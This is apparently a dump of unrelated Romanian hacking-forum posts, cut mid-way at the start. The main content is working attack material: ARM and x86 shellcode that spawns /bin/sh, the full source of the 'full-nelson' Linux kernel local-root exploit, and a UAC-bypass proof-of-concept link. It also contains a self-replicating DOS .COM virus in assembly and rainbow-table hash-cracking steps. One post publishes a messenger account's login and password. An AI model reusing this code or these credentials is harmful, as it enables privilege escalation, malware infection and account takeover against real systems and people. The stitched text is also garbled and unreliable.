that gives us in terms of null bytes. root@ARM9:/home/jonathan/shellcode/write# objdump -d write write: file format elf32-littlearm Disassembly of section .text: 00008054 <_start>: 8054: e28f6001 add r6, pc, #1 8058: e12fff16 bx r6 805c: 2210 movs r2, #16 805e: 4679 mov r1, pc 8060: 310c adds r1, #12 8062: 2001 movs r0, #1 8064: 2704 movs r7, #4 8066: df00 svc 0 8068: 1a00 subs r0, r0, r0 806a: 2701 movs r7, #1 806c: df00 svc 0 806e: 6873 ldr r3, [r6, #4] 8070: 6c65 ldr r5, [r4, #68] 8072: 2d6c cmp r5, #108 8074: 7473 strb r3, [r6, #17] 8076: 726f strb r7, [r5, #9] 8078: 2e6d cmp r6, #109 807a: 726f strb r7, [r5, #9] 807c: 0a67 lsrs r7, r4, #9 That's better, all that we have left now to do is to modify the following instructions: "svc 0" and "sub r0, r0, r0". For SVC we'll use "svc 1" which is perfect in this case. For "sub r0, r0, r0", the goal is to place 0 in register r0, however we cannot do a "mov r0, #0" as that will include a null byte. The only trick so far that I've come across is: sub r4, r4, r4 mov r0, r4 Which gives us: root@ARM9:/home/jonathan/shellcode/write# cat write.s .section .text .global _start _start: .code 32 # Thumb-Mode on add r6, pc, #1 bx r6 .code 16 # _write() mov r2, #16 mov r1, pc add r1, #14 <==== We changed the address again, since in exit() we've added mov r0, $0x1 instructions which messed it all up. mov r7, $0x4 svc 1 # _exit() sub r4, r4, r4 mov r0, r4 mov r7, $0x1 svc 1 .ascii "shell-storm.org\n" root@ARM9:/home/jonathan/shellcode/write# as -mthumb -o write.o write.s root@ARM9:/home/jonathan/shellcode/write# ld -o write write.o root@ARM9:/home/jonathan/shellcode/write# ./write shell-storm.org root@ARM9:/home/jonathan/shellcode/write# strace ./write execve("./write", ["./write"], [/* 17 vars */]) = 0 write(1, "shell-storm.org\n"..., 16shell-storm.org ) = 16 exit(0) = ? root@ARM9:/home/jonathan/shellcode/write# objdump -d write write: file format elf32-littlearm Disassembly of section .text: 00008054 <_start>: 8054: e28f6001 add r6, pc, #1 ; 0x1 8058: e12fff16 bx r6 805c: 2210 movs r2, #16 805e: 4679 mov r1, pc 8060: 310e adds r1, #14 8062: 2001 movs r0, #1 8064: 2704 movs r7, #4 8066: df01 svc 1 8068: 1b24 subs r4, r4, r4 806a: 1c20 adds r0, r4, #0 806c: 2701 movs r7, #1 806e: df01 svc 1 8070: 6873 ldr r3, [r6, #4] 8072: 6c65 ldr r5, [r4, #68] 8074: 2d6c cmp r5, #108 8076: 7473 strb r3, [r6, #17] 8078: 726f strb r7, [r5, #9] 807a: 2e6d cmp r6, #109 807c: 726f strb r7, [r5, #9] 807e: 0a67 lsrs r7, r4, #9 Here we are, we've got an operational shellcode without any null bytes. In C that gives us: root@ARM9:/home/jonathan/shellcode/write/C# cat write.c #include <stdio.h> char *SC = "\x01\x60\x8f\xe2" "\x16\xff\x2f\xe1" "\x10\x22" "\x79\x46" "\x0e\x31" "\x01\x20" "\x04\x27" "\x01\xdf" "\x24\x1b" "\x20\x1c" "\x01\x27" "\x01\xdf" "\x73\x68" "\x65\x6c" "\x6c\x2d" "\x73\x74" "\x6f\x72" "\x6d\x2e" "\x6f\x72" "\x67\x0a"; int main(void) { fprintf(stdout,"Length: %d\n",strlen(SC)); (*(void(*)()) SC)(); return 0; } root@ARM9:/home/jonathan/shellcode/write/C# gcc -o write write.c write.c: In function 'main': write.c:28: warning: incompatible implicit declaration of built-in function 'strlen' root@ARM9:/home/jonathan/shellcode/write/C# ./write Length: 44 shell-storm.org III - execv("/bin/sh", ["/bin/sh"], 0) ======================================= Now let's study a shellcode called execve(). The structure should look like this: r0 => "//bin/sh" r1 => "//bin/sh" r2 => 0 r7 => 11 root@ARM9:/home/jonathan/shellcode/shell# cat shell.s .section .text .global _start _start: .code 32 // add r3, pc, #1 // This whole section is for "Thumb Mode" bx r3 // .code 16 // mov r0, pc // We place the address of pc in r0 add r0, #10 // and add 10 to it (which then makes it point to //bin/sh) str r0, [sp, #4] // we place it on the stack (in case we need it again) add r1, sp, #4 // we move what was on the stack to r1 sub r2, r2, r2 // we subtract r2 from itself (which is the same as placing 0 in r2) mov r7, #11 // syscall execve in r7 svc 1 // we execute .ascii "//bin/sh" root@ARM9:/home/jonathan/shellcode/shell# as -mthumb -o shell.o shell.s root@ARM9:/home/jonathan/shellcode/shell# ld -o shell shell.o root@ARM9:/home/jonathan/shellcode/shell# ./shell # exit root@ARM9:/home/jonathan/shellcode/shell# We can verify that the shellcode contains no null bytes !! 8054: e28f3001 add r3, pc, #1 8058: e12fff13 bx r3 805c: 4678 mov r0, pc 805e: 300a adds r0, #10 8060: 9001 str r0, [sp, #4] 8062: a901 add r1, sp, #4 8064: 1a92 subs r2, r2, r2 8066: 270b movs r7, #11 8068: df01 svc 1 806a: 2f2f cmp r7, #47 806c: 6962 ldr r2, [r4, #20] 806e: 2f6e cmp r7, #110 8070: 6873 ldr r3, [r6, #4] So this is it, to find more ARM shellcodes please browse to: .:Shell-Storm.org:. | Search | IV - References ================ [x] .:Shell-Storm.org:. | Home | [1] Architecture ARM - Wikipédia [2] Nibbles microblog Break your ARMs Part 3 [3] The ARM Instruction Set (http://www.shell-storm.org/papers/files/664.pdf) [4] ARM Addressing Modes Quick Reference Card (http://www.shell-storm.org/papers/files/663.pdf

Linux Kernel <= 2.6.37 Local Privilege Escalation Hi all, I've included here a proof-of-concept local privilege escalation exploit for Linux. Please read the header for an explanation of what's going on. Without further ado, I present full-nelson.c: Happy hacking, Dan --snip-- /* * Linux Kernel <= 2.6.37 local privilege escalation * by Dan Rosenberg * @djrbliss on twitter * * Usage: * gcc full-nelson.c -o full-nelson * ./full-nelson * * This exploit leverages three vulnerabilities to get root, all of which were * discovered by Nelson Elhage: * * CVE-2010-4258 * ------------- * This is the interesting one, and the reason I wrote this exploit. If a * thread is created via clone(2) using the CLONE_CHILD_CLEARTID flag, a NULL * word will be written to a user-specified pointer when that thread exits. * This write is done using put_user(), which ensures the provided destination * resides in valid userspace by invoking access_ok(). However, Nelson * discovered that when the kernel performs an address limit override via * set_fs(KERNEL_DS) and the thread subsequently OOPSes (via BUG, page fault, * etc.), this override is not reverted before calling put_user() in the exit * path, allowing a user to write a NULL word to an arbitrary kernel address. * Note that this issue requires an additional vulnerability to trigger. * * CVE-2010-3849 * ------------- * This is a NULL pointer dereference in the Econet protocol. By itself, it's * fairly benign as a local denial-of-service. It's a perfect candidate to * trigger the above issue, since it's reachable via sock_no_sendpage(), which * subsequently calls sendmsg under KERNEL_DS. * * CVE-2010-3850 * ------------- * I wouldn't be able to reach the NULL pointer dereference and trigger the * OOPS if users weren't able to assign Econet addresses to arbitrary * interfaces due to a missing capabilities check. * * In the interest of public safety, this exploit was specifically designed to * be limited: * * * The particular symbols I resolve are not exported on Slackware or Debian * * Red Hat does not support Econet by default * * CVE-2010-3849 and CVE-2010-3850 have both been patched by Ubuntu and * Debian * * However, the important issue, CVE-2010-4258, affects everyone, and it would * be trivial to find an unpatched DoS under KERNEL_DS and write a slightly * more sophisticated version of this that doesn't have the roadblocks I put in * to prevent abuse by script kiddies. * * Tested on unpatched Ubuntu 10.04 kernels, both x86 and x86-64. * * NOTE: the exploit process will deadlock and stay in a zombie state after you * exit your root shell because the Econet thread OOPSes while holding the * Econet mutex. It wouldn't be too hard to fix this up, but I didn't bother. * * Greets to spender, taviso, stealth, pipacs, jono, kees, and bla */ #include <stdio.h> #include <sys/socket.h> #include <fcntl.h> #include <sys/ioctl.h> #include <string.h> #include <net/if.h> #include <sched.h> #include <stdlib.h> #include <signal.h> #include <sys/utsname.h> #include <sys/mman.h> #include <unistd.h> /* How many bytes should we clear in our * function pointer to put it into userspace? */ #ifdef __x86_64__ #define SHIFT 24 #define OFFSET 3 #else #define SHIFT 8 #define OFFSET 1 #endif /* thanks spender... */ unsigned long get_kernel_sym(char *name) { FILE *f; unsigned long addr; char dummy; char sname[512]; struct utsname ver; int ret; int rep = 0; int oldstyle = 0; f = fopen("/proc/kallsyms", "r"); if (f == NULL) { f = fopen("/proc/ksyms", "r"); if (f == NULL) goto fallback; oldstyle = 1; } repeat: ret = 0; while(ret != EOF) { if (!oldstyle) ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname); else { ret = fscanf(f, "%p %s\n", (void **)&addr, sname); if (ret == 2) { char *p; if (strstr(sname, "_O/") || strstr(sname, "_S.")) continue; p = strrchr(sname, '_'); if (p > ((char *)sname + 5) && !strncmp(p - 3, "smp", 3)) { p = p - 4; while (p > (char *)sname && *(p - 1) == '_') p--; *p = '\0'; } } } if (ret == 0) { fscanf(f, "%s\n", sname); continue; } if (!strcmp(name, sname)) { fprintf(stdout, " [+] Resolved %s to %p%s\n", name, (void *)addr, rep ? " (via System.map)" : ""); fclose(f); return addr; } } fclose(f); if (rep) return 0; fallback: uname(&ver); if (strncmp(ver.release, "2.6", 3)) oldstyle = 1; sprintf(sname, "/boot/System.map-%s", ver.release); f = fopen(sname, "r"); if (f == NULL) return 0; rep = 1; goto repeat; } typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; static int __attribute__((regparm(3))) getroot(void * file, void * vma) { commit_creds(prepare_kernel_cred(0)); return -1; } /* Why do I do this? Because on x86-64, the address of * commit_creds and prepare_kernel_cred are loaded relative * to rip, which means I can't just copy the above payload * into my landing area. */ void __attribute__((regparm(3))) trampoline() { #ifdef __x86_64__ asm("mov $getroot, %rax; call *%rax;"); #else asm("mov $getroot, %eax; call *%eax;"); #endif } /* Triggers a NULL pointer dereference in econet_sendmsg * via sock_no_sendpage, so it's under KERNEL_DS */ int trigger(int * fildes) { int ret; struct ifreq ifr; memset(&ifr, 0, sizeof(ifr)); strncpy(ifr.ifr_name, "eth0", IFNAMSIZ); ret = ioctl(fildes[2], SIOCSIFADDR, &ifr); if(ret < 0) { printf("[*] Failed to set Econet address.\n"); return -1; } splice(fildes[3], NULL, fildes[1], NULL, 128, 0); splice(fildes[0], NULL, fildes[2], NULL, 128, 0); /* Shouldn't get here... */ exit(0); } int main(int argc, char * argv[]) { unsigned long econet_ops, econet_ioctl, target, landing; int fildes[4], pid; void * newstack, * payload; /* Create file descriptors now so there are two references to them after cloning...otherwise the child will never return because it deadlocks when trying to unlock various mutexes after OOPSing */ pipe(fildes); fildes[2] = socket(PF_ECONET, SOCK_DGRAM, 0); fildes[3] = open("/dev/zero", O_RDONLY); if(fildes[0] < 0 || fildes[1] < 0 || fildes[2] < 0 || fildes[3] < 0) { printf("[*] Failed to open file descriptors.\n"); return -1; } /* Resolve addresses of relevant symbols */ printf("[*] Resolving kernel addresses...\n"); econet_ioctl = get_kernel_sym("econet_ioctl"); econet_ops = get_kernel_sym("econet_ops"); commit_creds = (_commit_creds) get_kernel_sym("commit_creds"); prepare_kernel_cred = (_prepare_kernel_cred) get_kernel_sym("prepare_kernel_cred"); if(!econet_ioctl || !commit_creds || !prepare_kernel_cred || !econet_ops) { printf("[*] Failed to resolve kernel symbols.\n"); return -1; } if(!(newstack = malloc(65536))) { printf("[*] Failed to allocate memory.\n"); return -1; } printf("[*] Calculating target...\n"); target = econet_ops + 10 * sizeof(void *) - OFFSET; /* Clear the higher bits */ landing = econet_ioctl << SHIFT >> SHIFT; payload = mmap((void *)(landing & ~0xfff), 2 * 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0); if ((long)payload == -1) { printf("[*] Failed to mmap() at target address.\n"); return -1; } memcpy((void *)landing, &trampoline, 1024); clone((int (void *))trigger, (void *)((unsigned long)newstack + 65536), CLONE_VM | CLONE_CHILD_CLEARTID | SIGCHLD, &fildes, NULL, NULL, target); sleep(1); printf("[*] Triggering payload...\n"); ioctl(fildes[2], 0, NULL); if(getuid()) { printf("[*] Exploit failed to get root.\n"); return -1; } printf("[*] Got root!\n"); execl("/bin/sh", "/bin/sh", NULL); } Sursa: Linux Kernel <= 2.6.37 Local Privilege Escalation

Elevation of privileges under Windows Vista/7 (UAC Bypass) 0day A Design Flaw in Windows Kernel API can Lead to privilege escalation. Mirror of Original Post: Bypassing UAC with User Privilege under Windows Vista/7 – Mirror PoC: Bypassing UAC with User Privilege under Windows Vista/7 - CodeProject (not available) mirror: http://www.exploit-db.com/sploits/uacpoc.zip After running this PoC, just type “whoami” in command prompt to see the escalated user credentials. Points of Interest All actions this PoC performs require only user privilege, but result in arbitrary kernel mode code execution due to the ambiguous design of RtlQueryRegistryValues. This design flaw exists in most versions of Windows kernels, yet no patch or documentation is publicly available on this issue. Additional Information This PoC may not correctly fix the exploited kernel context and resume execution without BSOD, such as on kernels ealier than 6.1.6000 are not supported, current supported kernels are: Windows Vista/2008 6.1.6000 x32, Windows Vista/2008 6.1.6001 x32, Windows 7 6.2.7600 x32, Windows 7/2008 R2 6.2.7600 x64. Beyond this scope you may contact me for information on how to tune the code to work correctly on your kernel or how the shellcode works, etc. Those contents are beyond the scope of this article and of no importance to the exploit, therefore it is not included.

Ultima oara cand am intrat pe ID erau 200 online. Nu ma intereseaza sa recuperez acel ID. Nu am ce face cu el, nu conosteam cam pe nimeni din lista, il foloseam sa mai relatez noutati legate de RST, dar in ultimul timp nu prea mai sunt.

Nu prea am timp sa intru pe acest ID si cum nu am ce face cu el: ID: nytro_rst Parola: aivreasaostibre PS: Am vreo 978 de persoane in lista, se poate face reclama la diverse. O idee ar fi sa imi dati ignore, cei care ma aveti in lista. Daca cineva vrea sa ma contacteze imi poate trimite un PM aici. Modificare: Am dat mass cu link-ul acestei pagini imediat dupa ce am postat si dupa 1 minut a intrat cineva pe messenger. Al doilea minut era si schimbata parola.

Fyodor Dostoyevsky, Dan Brown, Stephen King

Da, aveti dreptate, multi pacalici. Citit topicul si o sa ii vedeti. Deci ne puteti scapa de cativa pacaliti si asta foarte usor: nu mai intrati aici.

Inseamna ca si limbajul C e tot outdated, e din 1970, cam asa. Dar vai, se foloseste si in ziua de azi. Nu, ideea era ca aici sunt cateva lucruri interesante. Nu e cine stie ce, dar cred ca poate fi util.

How to Perform Cryptanalysis with Rainbow Tables Author: sToRm In this tutorial, I'm going to explain how to break (almost) any hash into cleartext using cryptanalysis with rainbow tables. So first, let's look at a hash, specifically an md5 hash. A standard md5 hash is 32 characters long, composed of alphanumeric (0-9, but only a-f) characters. Another standard hash, but less commonly used is sha1, which is 40 characters long. Basically, the idea behind hashing is that you input a string (your password) and a hash pops out. It is impossible to back-track the hash, i.e. decrypt it (although some weakness have been found in hashing algorithms, there is still no way to reverse the hash), so the only way to crack it is to make a bunch of hashes until we find one that matches. Common ways of creating lots of hashes (with the intent to find a match to the target hash) are brute-forcing and using a wordlist. Brute-force will come up with every string possible and hash it. If you keep a brute-force on long enough (this can take anywhere from a few hours to a few centuries - not kidding), you will eventually find a match, therefore cracking the hash. This is impractical, as most of us don't have access to university or government supercomputing grids. The second method of cracking a hash is by using a wordlist. Wordlists use the same principal as brute-forcing, except that they check the hash against a list of commonly-used passwords. Some wordlists are just dictionaries, while others are planned out and target certain genres of words. Wordlists work surprisingly well, mostly because people are dumb and use passwords like "password" or "1234567890". The third and perhaps most effective method of hash cracking is to use rainbow tables, which I am going to explain to you today. Rainbow tables take the same approach as brute-forcing but are so efficient as to cut down the cracking time to anywhere from a few seconds to a few days. This of course depends on the extension of your rainbow tables. More hashes in your tables means a greater chance of a successful crack, but it trades off for a larger file size and longer cracking time. It's up to you to find the balance. Okay, enough background information; let's get started with learning how to use rainbow tables. The best program for our task is "rcrack". Rcrack is available at http://www.antsight.com/zsl/rainbowcrack/ as an open source project (Note: rcrack and other bundled programs with it are only executable via the command line). Also, grab some free rainbow tables from http://www.freerainbowtables.com/rainbow_tables/ . You'll find most downloads for the tables themselves in BitTorrent format due to the sheer size (Note: never execute the cracking programs that come "pre-packaged" with table torrents, as most are trojaned. The tables themselves are clean, but always download the programs from their official sites.). The third and final thing you need is a decent character set; these direct rcrack to understanding what types of characters you wish to crack. The absolute best one I've found is by Ramius Kahn, which I've mirrored at http://www.gonullyourself.org/downloads/charset.txt . Now that you've got your rainbow tables downloaded, rcrack ready, and a decent charset, there's just one final step before you can use these tables. Using the program "rsort" (included in the rcrack package), you must sort each rainbow table (commands available by running the program with no arguments). Doing so is important enough to the efficiency of the cryptanalysis that rcrack will reject any rainbow tables that aren't sorted. W00t! Now we are ready to crack! Run rcrack with no arguments to learn the commands. Input the hash/es you wish to crack using the appropriate method, and go outside for a few hours. It will tie up your CPU and hard drive (it's pretty resource-intensive), so either do something else, or watch intently at the pretty scrolling text (I'm not kidding, I'm actually apt to do the second sometimes xD). Hopefully, a decrypted hash will pop out at the end, leaving you with a mild case of the lulz. Rcrack is pretty bitchy sometimes, so if you have any questions or are getting some nasty error, please please please refer to the documentation first (however limited it is), then Google, and then post your questions here. Good luck, and happy hashing! Written by sToRm February 15, 2008

Parasitic Viruses Author: z3ro model z3ro .the parasitic .com infector org 100h push disclaimer I (and the dmz/gny members/staff) take no responsibility for what you do with the knowledge gain from this article. This is for informational purposes only and i do not encourage criminal behavior. If you have a problem with me writing about this topic and think im am a criminal for doing so id like to point out Article 19 of Universal Declaration of Human Rights which states: "Everyone has the right to freedom of opinion and expression;this right includes freedom to hold opinions without interference and to seek, receive and impart information and ideas through any media and regardless of frontiers." Whats happening this time? 1. Why asm is best for viruses 2. What is a parasitic virus 3. The delta offset and infection 4.fectoid v 1.0 ;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~; Call Asm_is_the_shit Now if you have ever seen the source for a virus you would have probably noticed that is in assembly(90% of the time). Now why would it be in asm? isn't asm uber hard? Well asm is a low level language as it deals directly with the cpu OS and memory very closely. This allows you things you couldn't do with C for example such as calculate a delta offset(more on this later). When using C it is possible to create a basic overwriting virus. But these are lame and probably wouldn't work in this day and age due to protected mode. ret ;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~; Call parasitic Ok so what is a parasitic virus. It is quite different from an overwriting virus as it does not damage the host program. There are two main methods to doing this. We must first place a jump at the start of our host to our virus. WE must then calculate the offset to the end of the host and place our virus there. WE must also make sure that we do return control back to the host, or else we risk suspicion and errors. There are two main methods to writing a parasitic virus(DOS0 we could append to the front of the code or at the end. The front tends to be a little faster though it is much more complicated. Te second method is to append at the end and that is what we are going to cover here. retn ;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~; Call infect Ok so you heard all the theory time for some code . When writing a parasitic virus you first need to calculate the delta offset. this is very easy to do but it is also a very important step first: call next next: pop di sub di,offset next Now we have the offset that points to our code. Another very important part of a virus is the find mechanism. This is also very easy as all we have to do is use the 4eh function as interrupt 21h. masker db "*.com",0 lea dx,[bp+offset masker] mov ah,4eh ect... ok so we have found our unwilling host. But how do we know if we havent infected him already? We simply read the first few bytes and compare them to a string(which usually consists of a jmp to our code). mov ax,3d02h lea dx,[bp+offset dta+30] mov cx,3 int 21h xchg ax,bx int 21h mov ax,word ptr [bp+dta+26] mov cx,word ptr [bp+ID+1] ID db "lalala",0 And now the moment you have all been waiting for INFECTION!!!! Which is infact extremely simple. We first must set up the jmp to our code and then or id string then write them to the front of the host. WE do however have to use function 4200h which is straight forward. mov ah,40h mov cx,3 lea dx,[bp+jmpz+ID] int 21h jmpz db 0e9h ; jmp to start of virus code ID db 20h,20h,0 we then reset the file ptr and write the rest. mov ah,40h mov cx,eov-offset start_virus lea dx,[bp+offset start_virus] int 21h We have jsut gone through the basic methods to a parasitic virus. WE have only discussed how to infect a .com file. In the next article we will cover DOs .EXEs and a little PE(i still cant infect them properly ) file infection. ret ;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~; push v1.0 call fectoid Alright well i threw togeather some basic code togeather some code for this article. It IS VERY basic. It only covers what we have discussed in this article. Now it is very poorly done tbh but i feel its very easy to learn from. keep in mind i only spent about 20min working on it, but you can laugh if you want. Id also like to point out that none of these viruses will work on windoze. The techniques are similar but now you cant simply overwrite a file and get away with it. Learning how to do this is the first step. Sooner or later ill get into PE infetion which is MUCH MUCH more complicated. Anyways i hope you enjoy ill post a better version sometime soon, an infection checking system that actually works and better coding in general. Enjoy. .model small org 100h .code .startup Vic db "*.com",0 dta db 42 dup (?) junk db 41h,41h,0 leap db 0e9h,41h,0 _fect db ? ; here we set up offsets and the like start: db 0e9h dw 0 do:call next next: pop di sub di,offset next lea si,[bp+offset junk] mov di,100h push di movsw movsb mov _fect,5 ;up to 5 infections per run ;set up dta to match our delta or else bad things will happen.... lea dx,[bp+offset dta] call DTA_set find_first: mov ah,4eh lea dx,[bp+offset vic] int 21h call ok find_next: mov ah,4fh int 21h call ok jc quit jmp find_next ; here we make sure the file is a .com file and check for previsious infections ok: mov ax,3fh lea dx,[bp+offset dta+30] mov cx,3 int 21h xchg ax,bx int 21h mov ax,word ptr [bp+dta+26] mov cx,word ptr [bp+junk+1] add cx,eov-do+3 cmp ax,cx sub ax,3 mov word ptr [bp+buff],ax xor al,al call file_ mov ah,40h mov cx,3 lea dx,[bp+leap] int 21h mov al,2 call file_ mov ah,40h mov cx,eov-do lea dx,[bp+do] int 21h close: mov ah,3eh int 21h dec _fect cmp _fect,0 jnz find_next jmp host host: mov dx,80h int 21h mov di,100h jmp di quit: mov ax,4c00h int 21h ; sets the dta duh... dta_set: mov ah,1ah int 21h retn ; this sets up and returns our file pointer file_: mov ah,42h xor cx,cx xor dx,dx int 21h eov equ $ buff dw ? END

Shellcoding with Direct Stack Usage - h0yt3r ###SHELLCODING WITH DIRECT STACK USAGE### ~by h0yt3r Hai This is an example of how to produce nullbyteless shellcode out of a simple assembler code with two methods of stackusage. I will start with an example which shows how to execute a bourne shell in assembler (nasm): ------------bla.asm section .data binsh db '/bin/sh',0 ;save '/bin/sh' string at data section section .text global _start _start: mov eax,11 ;syscall execve mov ebx,binsh ;move the '/bin/sh' string adress into ebx push 0 ;as the next argument (*const argv[]) is an array push binsh ;we will need to save it on the stack and null-terminate it mov ecx,esp ;then put the first adress of the stack into ecx mov edx,0 ;no *const envp[] int 0x80 ;kernel call ;eof ------------ Okay we will assemble and link this code: h0yt3r@Cain:~/Desktop$ nasm -f elf bla.asm h0yt3r@Cain:~/Desktop$ ld -o bla bla.o h0yt3r@Cain:~/Desktop$ ./bla sh-3.2$ exit exit Works fine. Lets have a look at the objdump. h0yt3r@Cain:~/Desktop$ objdump -D bla bla: file format elf32-i386 Disassembly of section .text: 08048080 <_start>: 8048080: b8 0b 00 00 00 mov $0xb,%eax 8048085: bb a0 90 04 08 mov $0x80490a0,%ebx 804808a: 68 00 00 00 00 push $0x0 804808f: 68 a0 90 04 08 push $0x80490a0 8048094: 89 e1 mov %esp,%ecx 8048096: ba 00 00 00 00 mov $0x0,%edx 804809b: cd 80 int $0x80 Disassembly of section .data: 080490a0 <binsh>: 80490a0: 2f das 80490a1: 62 69 6e bound %ebp,0x6e(%ecx) 80490a4: 2f das 80490a5: 73 68 jae 804910f <__bss_start+0x67> ... Disassembly of section .comment: 00000000 <.comment>: 0: 00 54 68 65 add %dl,0x65(%eax,%ebp,2) 4: 20 4e 65 and %cl,0x65(%esi) 7: 74 77 je 80 <_start-0x8048000> 9: 69 64 65 20 41 73 73 imul $0x65737341,0x20(%ebp,%eiz,2),%esp 10: 65 11: 6d insl (%dx),%es:(%edi) 12: 62 6c 65 72 bound %ebp,0x72(%ebp,%eiz,2) 16: 20 32 and %dh,(%edx) 18: 2e 30 35 2e 30 31 00 xor %dh,%cs:0x31302e h0yt3r@Cain:~/Desktop$ As we can see, this code needs more than one section for execution. Its is also full of 0-bytes which is kinda evil for later shellcode since 0-bytes are treated as string terminator when it is passed as a parameter for example. A _useful_ asm code _without_ different sections and _without_ 0-bytes for later shellcode using the call technique: ------------bla2.asm section .text global _start _start: jmp short two ;we short jump to two for saving '/bin/sh' on the stack (look at two now) one: pop ebx ;as the return adress is saved on top of the stack and points to '/bin/sh', ;it is just popped from the stack and saved into ebx (char *path) ;ok the adress of '/bin/shX' is saved in ebx now. the X will represet the null terminating byte xor eax,eax ;0-out eax mov byte [ebx + 7],al ;this instruction replaces the X with the value of al ;(count seven bytes up the data to which ebx is pointing to and put a null there) => nullterminate /bin/sh ;this will also only work if the shellcode is saved on the stack (eg when its injected into a ;vulnerable programme since we only have write access there) push eax ;=> push 0 for null termination of '/bin/sh' push eax ;restore ebx at the stack so that the stackpointer points to nullterminated '/bin/sh' mov ecx,esp ;stackpointer into ecx (*const argv[]) mov edx,esp ;same to edx (*const envp[]) ;we could also say 'mov edx,0' but this would just produce another 0-byte mov al,11 ;syscall execve int 0x80 ;make the kernelcall two: call one ;on execution we directly jump here and make a call _upwards_ again. ;_upwards_ is important. a call allows much longer jump distances, so if we make a call downwards ;with a value of 10 for example, the rest of the value would be filled with 0-bytes. ;so when we call upwards, we are passing a negative number as value ;(leading to 0xff...) which will not any contain 0-bytes. db '/bin/shX' ;when making a call, the adress of the next instruction is pushed onto the stack and will be ;treated as return adress. This tells the processor where execution flow has to be continued when function ;'one' is finished. in this case, the return adress will just point to the '/bin/sh' string. ;eof ------------ Lets look at the objdump again h0yt3r@Cain:~/Desktop$ nasm -f elf bla2.asm h0yt3r@Cain:~/Desktop$ ld -o bla2 bla2.o h0yt3r@Cain:~/Desktop$ objdump -d bla2 h0yt3r@Cain:~/Desktop$ objdump -d foo foo: file format elf32-i386 Disassembly of section .text: 08048060 <_start>: 8048060: eb 10 jmp 8048072 <two> 08048062 <one>: 8048062: 5b pop %ebx 8048063: 31 c0 xor %eax,%eax 8048065: 88 43 07 mov %al,0x7(%ebx) 8048068: 50 push %eax 8048069: 50 push %eax 804806a: 89 e1 mov %esp,%ecx 804806c: 89 e2 mov %esp,%edx 804806e: b0 0b mov $0xb,%al 8048070: cd 80 int $0x80 08048072 <two>: 8048072: e8 eb ff ff ff call 8048062 <one> 8048077: 2f das 8048078: 62 69 6e bound %ebp,0x6e(%ecx) 804807b: 2f das 804807c: 73 68 jae 80480e6 <two+0x74> 804807e: 58 pop %eax h0yt3r@Cain:~/Desktop$ We can see that our code doesn't produce any 0-bytes anymore, so now we could perfectly use it as shellcode. Okay, now an imo more elegant way of code with direct stackusage without calls and jumps: ------------bla3.asm section .text global _start _start: xor eax,eax ;0-out eax push eax ;put 0 onto stack for null-terminating push 0x68732F2F ;put '/bin/sh' onto stack push 0x6E69622F ;actually it is 'hs//nib/' since the string has to be pushed in reversed order. ;we are also using two '/' cos our data needs to stay directly at the 8 byte bound, for not producing 0-bytes mov ebx,esp ;stackpointer (/bin/sh) to ebx (char *path) push eax ; => push 0 push eax ;put ebx onto stack mov ecx,esp ;since ecx needs null-terminated *const argv[] which is same as ebx mov edx,esp ;*const envp[] whatever mov al,11 ;syscall execve int 0x80 ;fire ;eof ------------ Assembling, linking: h0yt3r@Cain:~/Desktop$ nasm -f elf bla3.asm h0yt3r@Cain:~/Desktop$ ld -o bla2 bla3.o h0yt3r@Cain:~/Desktop$ ./bla3 sh-3.2$ exit exit h0yt3r@Cain:~/Desktop$ objdump -d bla3 bla3: file format elf32-i386 Disassembly of section .text: 08048060 <_start>: 8048060: 31 c0 xor %eax,%eax 8048062: 50 push %eax 8048063: b0 0b mov $0xb,%al 8048065: 68 2f 2f 73 68 push $0x68732f2f 804806a: 68 2f 62 69 6e push $0x6e69622f 804806f: 89 e3 mov %esp,%ebx 8048071: 52 push %edx 8048072: 53 push %ebx 8048073: 89 e1 mov %esp,%ecx 8048075: 89 e2 mov %esp,%edx 8048077: cd 80 int $0x80 h0yt3r@Cain:~/Desktop$ This looks even better, doesn't it? Now use it! I'll take katharsis' extractor; it's nothing special but kinda useful h0yt3r@Cain:~/Desktop$ perl shellgen.pl bla3 [*] shellcode generator [*] written by katharsis [*] www.katharsis.x2.to [*] nebelfrost23@web.de [^] generating opcode... [^] generating shellcode... [^] formating shellcode [^] done, here you are: \x31\xc0\x50\xb0\x0b\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x89\xe2\xcd\x80 h0yt3r@Cain:~/Desktop$

A Crash Course In Exporting From A DLL With A Detailed Look At The DEF File Using Visual C++ Professional 6.0 By: George Chastain Date: 7/21/2000 When creating a new DLL, an Import Library (with a ".LIB" extension) is created. This Import Library has to remain consistent with the DLL used to create the library -- at least for the code utilized by the client. Occasionally, you may find yourself delivering multiple products to multiple customers and some of these products may share a particular DLL. But what happens if a customer obtains a new version of one of those products but doesn't obtain new versions of the other products that use that particular DLL? It is possible that the new version of the DLL delivered with the new product could break the other, older product that the customer already has. This can happen if information contained within the new version of the DLL becomes inconsistent with the information recorded for the DLL by the Import Library used to link the other older products. Before describing how to help alleviate some the possibility of this occurring, we will take a brief look at what an Import Library contains. The Import Library The Import Library does not contain any code. It may be thought of as a "road map" to the functions, classes and other declarations provided by the DLL. When linking a client of a DLL, the Linker needs to record the information contained in this "road map" in the client that will use the DLL. That information will allow the client to locate the things provided, or exported, by the DLL. See Figure 1. Figure 1 DLL And Import Library When a client of a DLL references something exported by the DLL, the client utilizes the information obtained by linking with the Import Library to find the item being referenced in the DLL. There is no actual code or resources in the Import Library. All of that is contained in the DLL. The Import Library just tells the client of the DLL where to find the things 